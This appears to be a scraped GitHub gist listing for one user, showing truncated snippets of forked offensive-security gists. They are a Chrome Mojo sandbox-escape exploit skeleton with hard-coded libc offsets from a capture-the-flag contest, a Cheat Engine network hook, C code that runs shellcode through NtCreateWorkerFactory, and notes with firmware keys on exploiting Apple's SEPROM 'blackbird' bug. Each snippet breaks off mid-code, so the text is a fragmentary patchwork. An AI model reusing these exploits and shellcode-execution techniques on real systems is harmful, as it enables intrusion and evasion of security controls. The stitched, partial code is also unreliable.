boy1337 bb33bb
<html>
<head>
<title>RedPwn sbx-1</title>
</head>
<body>
<h1>:thonk:</h1>
<pre id='log'></pre>
</body>
<script src='./mojo_bindings.js'></script>
<script src='./third_party/blink/public/mojom/desert.mojom.js'></script>
function pwn() {
/* Helpers */
var k_jsObjectSize = 0x70
var fclose_got = 0x45e58
var __libc_atoi = 0x18ea90
var __libc_environ = 0x1ef2e0
var __free_got = 0x4dde0
var __je_free = 0x13b10
<html>
<head>
<script>
( async() => {
let gc = function() {
for(let i = 0; i < 100; i++) {
new ArrayBuffer(0x10000000);
}
}
@bb33bb
bb33bb / windbg_pwndbg_wrap.js
Created April 20, 2022 15:29 — forked from hkraw/windbg_pwndbg_wrap.js
add proper chain handling
//"use script";
const color_red = "";
const color_green = "";
const color_yellow = "";
const color_blue = "";
const color_mag = "";
const color_cyan = "";
const color_default = "";
class Helpers {
constructor() {
this.cvt_buf = new ArrayBuffer(8);
this.cvt_f64a = new Float64Array(this.cvt_buf);
this.cvt_u64a = new BigUint64Array(this.cvt_buf);
this.cvt_u32a = new Uint32Array(this.cvt_buf);
}
ftoi(f) {
@bb33bb
bb33bb / ce_hook_network.lua
Created June 13, 2022 07:47 — forked from robb83/ce_hook_network.lua
Cheat Engine Scripts
-- Simple network hook script
addressOfSend = getAddress("WS2_32.send")
addressOfGetStatus1 = getAddress("Kernel32.GetQueuedCompletionStatus")
addressOfGetStatus2 = getAddress("Kernel32.GetQueuedCompletionStatusEx")
addressOfCreateIoCompletionPort = getAddress("Kernel32.CreateIoCompletionPort")
print(string.format("WS2_32.send = %x, Kernel32.GetQueuedCompletionStatus = %x, Kernel32.GetQueuedCompletionStatusEx = %x, Kernel32.CreateIoCompletionPort = %x", addressOfSend, addressOfGetStatus1, addressOfGetStatus2, addressOfCreateIoCompletionPort))
debug_removeBreakpoint(addressOfSend)
debug_removeBreakpoint(addressOfGetStatus1)
debug_removeBreakpoint(addressOfGetStatus2)
@bb33bb
bb33bb / shellcode_exec_workerfactory.c
Created May 5, 2023 21:53 — forked from RistBS/shellcode_exec_workerfactory.c
Just another shellcode execution technique :)
#include <Windows.h>
#include <stdio.h>
#define PRINTDEBUG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
typedef struct _UNICODE_STRING {
@bb33bb
bb33bb / Source.cpp
Created May 5, 2023 21:53 — forked from alfarom256/Source.cpp
Thread Execution via NtCreateWorkerFactory
#include <Windows.h>
#include <winternl.h>
#include <stdio.h>
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
// https://github.com/winsiderss/systeminformer/blob/17fb2e0048f062a04394c4ccd615b611e6ffd45d/phnt/include/ntexapi.h#LL1096C1-L1115C52
typedef enum _WORKERFACTORYINFOCLASS
{
WorkerFactoryTimeout, // LARGE_INTEGER
@bb33bb
bb33bb / blackbird_a8_a9.txt
Created July 18, 2023 03:11
A8/A9 blackbird exploitation
On Aug 6 2020 @windknown posted about a SEPROM bug called "blackbird", with an attached presentation: https://twitter.com/windknown/status/1291308058493116416?s=20
@littlelailo also posted that he had the bug, with their own gist/explanation: https://twitter.com/littlelailo/status/1296774861344432131?s=20
Short recap of the bug: the function in which SEPROM prepares its external TZ0 memory reads the TZ0/TZ1 base/end registers and shifts them (<< 12) in 32-bit arithmetic, so the shift runs out of bounds and any bit above 20 becomes invisible to SEPROM, whereas AMCC (Apple's Memory Cache Controller) casts the 32-bit register to 64 bits before shifting. The two sides therefore disagree about where the region is, which can result in arbitrary TZ0 r/w from the AP side.
NOTE: there will not be much explanation of how some things work here, just pure exploitation from my perspective. To learn more about SEPROM and the bug itself, read windknown's presentation first.
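The width mismatch in the recap above, modelled in C as an added example (this is not code from the gist, from SEPROM or from Apple; the function names are mine and the register values are constructed placeholders, not real TZ0 settings). SEPROM computes `reg << 12` as a 32-bit value, so bits 20 and up of the register land at bit 32 and higher and are dropped; AMCC widens the register to 64 bits first and keeps them. The last helper shows the consequence: OR-ing a value into those high bits leaves SEPROM's view unchanged while AMCC moves the region up by a multiple of 4 GiB.

```c
// Added example: models the 32-bit vs 64-bit interpretation of the same
// TZ0 base register by two consumers. Names and values are constructed.
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

// SEPROM side: the shift is done in 32-bit arithmetic, so bits 20..31 of
// `reg` are shifted past bit 31 and silently discarded.
static uint32_t seprom_tz_addr(uint32_t reg) {
    return (uint32_t)(reg << 12);
}

// AMCC side: the 32-bit register is widened to 64 bits before the shift,
// so every bit of `reg` survives in the resulting physical address.
static uint64_t amcc_tz_addr(uint32_t reg) {
    return (uint64_t)reg << 12;
}

// True when SEPROM and AMCC derive different addresses from the same
// register value, i.e. when any of bits 20..31 is set.
static bool views_disagree(uint32_t reg) {
    return (uint64_t)seprom_tz_addr(reg) != amcc_tz_addr(reg);
}

// Produce a register value that SEPROM decodes exactly like `reg` but that
// AMCC places `delta_4g` * 4 GiB higher. Only the low 12 bits of `delta_4g`
// fit in the invisible range (bits 20..31).
static uint32_t alias_reg(uint32_t reg, unsigned delta_4g) {
    return reg | ((uint32_t)(delta_4g & 0xfff) << 20);
}

int main(void) {
    uint32_t reg = 0x0008F000u;            // constructed: both sides see 0x8F000000
    uint32_t aliased = alias_reg(reg, 1);  // bit 20 set: invisible to SEPROM

    printf("reg     =%08x seprom=%08x amcc=%016llx disagree=%d\n", reg,
           seprom_tz_addr(reg), (unsigned long long)amcc_tz_addr(reg),
           views_disagree(reg));
    printf("aliased =%08x seprom=%08x amcc=%016llx disagree=%d\n", aliased,
           seprom_tz_addr(aliased), (unsigned long long)amcc_tz_addr(aliased),
           views_disagree(aliased));
    return 0;
}
```

The point of the model is the differential: the register SEPROM validates and the register AMCC enforces are the same bits, but the decoders are not equivalent, so a value that passes SEPROM's view of the region need not describe the region AMCC actually protects.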
How to get the bug working:
1. read the TZ0/TZ1 base/end register values from iBoot (platform_bootprep)
iPad6,3
iOS 9.3 (13E234)
sep-firmware.j127.RELEASE.im4p
IV: 0F91420AA134E6D8D6807EFA7FFAB446
KEY: 42F908A3012E9E2DC22EDD818621C4BECFB41AED43D78671AB28BB8126268DB4
iPad6,8
iPadOS 13.2 (17B84)
sep-firmware.j99a.RELEASE.im4p